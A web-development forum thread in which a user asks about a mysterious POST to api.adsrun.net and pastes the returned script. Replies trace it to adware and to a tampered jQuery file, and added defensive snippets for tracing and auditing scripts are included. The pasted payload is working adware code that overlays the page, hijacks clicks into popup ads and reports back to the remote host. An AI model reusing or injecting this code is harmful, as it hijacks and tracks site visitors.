unknown POST api.adsrun.net/post" on localhost?

ershadow786
Forum Newbie
Posts: 2
Joined: Mon Nov 09, 2015 7:31 am

unknown POST api.adsrun.net/post" on localhost?

Post by ershadow786 »

I was debugging some JavaScript code in Firebug when I saw a strange POST in Firebug, and this is worrying me.
I have a registration form; when I reload the page I see the following in Firebug: "POST http://api.adsrun.net/post"

Response Header
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: keep-alive
Content-Type: application/json
Date: Mon, 09 Nov 2015 13:25:43 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: nginx/1.9.4
Set-Cookie: PHPSESSID=a0f52694494daab764d719b907baff6b; expires=Sat, 07-Nov-2020 13:25:43 GMT; Max-Age=157680000; path=/
Transfer-Encoding: chunked
access-control-allow-cred...: true
access-control-allow-head...: Content-Type
access-control-allow-orig...: http://localhost
p3p: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"


RESPONSE is something like this

{"eval":"\nvar ad = response.ad;\nvar ad_token = response.ad_token;\nfunction postAction(xlog, cb) {
\n var params = {\"ad_id\":14,\"show_id\":27,\"user_id\":1573819,\"host\":\"localhost\",\"time\":1447075543
,\"hash\":\"6dd0fd2392c7a0cc9800ccfcea9143ed\"};\n params.postActionParams = xlog;\n ajax(\"http:\
/\/api.adsrun.net\/postAction\", params, cb);\n}\nvar ontw = false;\r\nfunction oNT() {\r\n if (ontw
) return;\r\n else ontw = true;\r\n var b = window.open(ad.url, \"new\" + Math.floor(9999999 *
Math.random()) + 1);\r\n if (b) postAction(); \r\n\r\n\/\/ var e = navigator.userAgent.toLowerCase
(),o = -1 != e.indexOf(\"opera\"),g = -1 != e.indexOf(\"chrome\");\r\n\r\n \/\/ if (document.createEvent
&& (o || g)) {\r\n \/\/ if (false) {\r\n \/\/ var b = document.createElement(\"a\");\r\n
\/\/ b.href = ad.url;\r\n \/\/ b.target = \"_blank\";\r\n \/\/ var c = document.createEvent
(\"MouseEvents\");\r\n \/\/ c.initMouseEvent(\"click\", !0, !0, window, 1, 0, 0, 0, 0, !0, !1,
!1, !1, 1, null);\r\n \/\/ b.dispatchEvent(c);\r\n \/\/ postAction();\r\n \/\/ } \r\n
\/\/ else {\r\n \/\/ var b = window.open(\"about:blank\", \"win\" + Math.floor(9999999 * Math
.random()) + 1);\r\n \/\/ with(b) opener.window.focus(), b.location = ad.url, \"undefined\" !=
typeof window.mozPaintCount && window.open(\"about:blank\").close()\r\n \/\/ if (b) postAction
(); \r\n \/\/ }\r\n \r\n\r\n}\r\n\r\n\r\n\r\n var startTimeout = setTimeout(myStart, 100),divret
= null;\r\nif (\"function\" == typeof window.addEventListener) window.addEventListener(\"load\", function
() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n}, !1);\r\nelse try {\r\n window.attachEvent
(\"onload\", function() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n })\r\n} catch
(D) {}\r\n\r\nfunction myStart() { \r\n\r\n var pdiv = document.createElement('div');\r\n
pdiv.style.position = \"fixed\";\r\n pdiv.style.zIndex = \"2147483647\";\r\n pdiv.style
.width = \"100%\";\r\n pdiv.style.height = \"100%\";\r\n pdiv.style.left = \"0px\";\r\n
pdiv.style.top = \"0px\";\r\n pdiv.onclick = function() {\r\n oNT();\r\n document
.body.removeChild(pdiv);\r\n }\r\n if (!divret) {divret=document.body.appendChild(pdiv);}\r
\n document.addEventListener ? document.addEventListener(\"mouseup\", oNT, !1) : document.attachEvent
(\"onmouseup\", oNT);\r\n \r\n}","ad":{"url":"http:\/\/www.adcash.com\/ad\/display.php?r=356017"
},"ad_token":"31f68d20ffc59b05601acfa0dc349e4b14"}


I am not sure whether this is some type of malware that may be harmful. I have had this problem for 2 days; it looks strange to me and I need your suggestions.

JSON :
[text]var ad = response.ad;
var ad_token = response.ad_token;
function postAction(xlog, cb) {
    var params = {"ad_id":14,"show_id":27,"user_id":1573819,"host":"localhost","time":1447075543,"hash":"6dd0fd2392c7a0cc9800ccfcea9143ed"};
    params.postActionParams = xlog;
    ajax("http://api.adsrun.net/postAction", params, cb);
}
var ontw = false;

function oNT() {
    if (ontw) return;
    else ontw = true;
    var b = window.open(ad.url, "new" + Math.floor(9999999 * Math.random()) + 1);
    if (b) postAction();

    // var e = navigator.userAgent.toLowerCase(),o = -1 != e.indexOf("opera"),g = -1 != e.indexOf("chrome");

    // if (document.createEvent && (o || g)) {
    // if (false) {
[/text]
requinix
Spammer :|
Posts: 6617
Joined: Wed Oct 15, 2008 2:35 am
Location: WA, USA

Re: unknown POST api.adsrun.net/post" on localhost?

Post by requinix »

adsrun.net is a domain used by some kind of proxy/filter/etc. bypassing stuff. Do you have an extension installed that has anything to do with that? What <script> or Javascript code is triggering the call?
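One way to answer the question of which script triggers the call, as an added example that is not part of the original post: wrap `XMLHttpRequest.prototype.open` and capture a stack trace for every request that leaves the page's origin. The names `instrumentXhr`, `pageOrigin` and `report` are chosen for this sketch, and it assumes the request is made through `XMLHttpRequest`.

```javascript
// Added example: report which script opens XHR requests to other origins.
// instrumentXhr, pageOrigin and report are names chosen for this sketch.
function instrumentXhr(XhrClass, pageOrigin, report) {
  const originalOpen = XhrClass.prototype.open;
  XhrClass.prototype.open = function (method, url, ...rest) {
    let target;
    try {
      target = new URL(url, pageOrigin); // resolves relative URLs too
    } catch (e) {
      target = null; // unparsable URL: let the real open() raise its own error
    }
    if (target && target.origin !== pageOrigin) {
      // The stack lists the file and line of every caller, up to the script
      // that issued the request.
      const stack = new Error("cross-origin XHR").stack || "";
      report({ method: String(method).toUpperCase(), url: target.href, stack });
    }
    return originalOpen.call(this, method, url, ...rest);
  };
  // Return an undo function so the hook can be removed after debugging.
  return function restore() {
    XhrClass.prototype.open = originalOpen;
  };
}

// In a browser console, before the page's scripts run:
//   instrumentXhr(XMLHttpRequest, location.origin, (hit) => console.warn(hit));
```

A request that shows up in the network panel but never reaches `report` was not issued through the page's own `XMLHttpRequest`, which points away from the site's scripts.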
ershadow786
Forum Newbie
Posts: 2
Joined: Mon Nov 09, 2015 7:31 am

Re: unknown POST api.adsrun.net/post" on localhost?

Post by ershadow786 »

Thanks for the reply.
I am not sure which JavaScript code is triggering that call [http://api.adsrun.net/post], but after looking at the JSON there is a key url whose value is "http://www.newpoptab.com/watch?key=60fd ... 056f84047d". This changed after a restart, and before that it was tradeadexchange. After googling I found that they were adware malware. I tried antivirus (AVG) but none could remove it; SpyHunter could detect it, but removing it requires the paid version :(. Any help appreciated.
requinix
Spammer :|
Posts: 6617
Joined: Wed Oct 15, 2008 2:35 am
Location: WA, USA

Re: unknown POST api.adsrun.net/post" on localhost?

Post by requinix »

Yeah, that could certainly explain it.

I normally clean computers by hand so I can't point you to any good anti-malware stuff. I think HijackThis is still around, but it takes a bit of know-how regarding what it reports and what should be cleaned. Microsoft has a free antivirus too. Don't remember what it's called.
Also check the most obvious place: list of programs installed in Windows. Some of the nicer malware actually lets you uninstall it.
Celauran
Moderator
Posts: 6425
Joined: Tue Nov 09, 2010 2:39 pm
Location: Montreal, Canada

Re: unknown POST api.adsrun.net/post" on localhost?

Post by Celauran »

requinix wrote: Microsoft has a free antivirus too. Don't remember what it's called.
Do you mean Microsoft Security Essentials? I haven't used Windows in years, so that may not be current.
requinix
Spammer :|
Posts: 6617
Joined: Wed Oct 15, 2008 2:35 am
Location: WA, USA

Re: unknown POST api.adsrun.net/post" on localhost?

Post by requinix »

Celauran wrote:
requinix wrote: Microsoft has a free antivirus too. Don't remember what it's called.
Do you mean Microsoft Security Essentials? I haven't used Windows in years, so that may not be current.
Yeah. There's also a somethingorother Endpoint Protection which is basically the business version. They're consistently not rated very highly, but they don't cripple the computer like some other free AV programs do.
vgstef
Forum Newbie
Posts: 1
Joined: Tue Feb 09, 2016 12:59 am

Re: unknown POST api.adsrun.net/post" on localhost?

Post by vgstef »

I found this thread looking for information. I got the same issue, and I found where it came from.

In our website project, a colleague included the file "jquery-2.2.0.min.js", but that had been hacked with a short on load window listener function. That function was querying a website to get spam content.
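A check that would flag a modified vendored library like the one described above, as an added example that is not part of the original post: compare the file's digest with a pinned value and list the hosts its text references that are not on an allowlist. The function names, the allowlist and the sample library text are constructed for illustration; the thread does not give the real file's hash, so the pinned digest here is derived from the constructed clean text.

```javascript
const nodeCrypto = require("crypto");

// Subresource Integrity style digest: "sha384-" + base64(SHA-384 of the bytes).
function sriDigest(bytes) {
  return "sha384-" + nodeCrypto.createHash("sha384").update(bytes).digest("base64");
}

// Hostnames of absolute http(s) URLs in the script text, including the
// JSON-escaped form (http:\/\/host) seen in the response earlier in the thread.
function referencedHosts(source) {
  const hosts = new Set();
  const pattern = /https?:(?:\\?\/){2}([a-z0-9.-]+)/gi;
  for (const match of source.matchAll(pattern)) {
    hosts.add(match[1].toLowerCase().replace(/\.+$/, ""));
  }
  return [...hosts].sort();
}

// Compare one vendored file against its pinned digest and a host allowlist.
function auditVendoredScript(source, pinnedDigest, allowedHosts) {
  const allowed = new Set(allowedHosts);
  return {
    digestMatches: sriDigest(Buffer.from(source, "utf8")) === pinnedDigest,
    unexpectedHosts: referencedHosts(source).filter((h) => !allowed.has(h)),
  };
}

// Constructed sample input: a stand-in for a minified library, and the same
// text with a load listener appended that references a third-party host.
const CLEAN = "/*! demo-lib v1.0.0 | http://example.org/license */" +
  "(function(w){w.demo=function(){return 1;};})(this);";
const TAMPERED = CLEAN +
  ';window.addEventListener("load",function(){var u="http://api.adsrun.net/post";},false);';
// In practice the pinned digest comes from the publisher's release, not from
// the copy being checked; here it is derived from the constructed CLEAN text.
const PINNED = sriDigest(Buffer.from(CLEAN, "utf8"));

console.log(auditVendoredScript(CLEAN, PINNED, ["example.org"]));
console.log(auditVendoredScript(TAMPERED, PINNED, ["example.org"]));
```

The same pinned digest can be placed in the `integrity` attribute of a `<script>` tag when the library is loaded from a CDN, so the browser refuses a file whose bytes have changed.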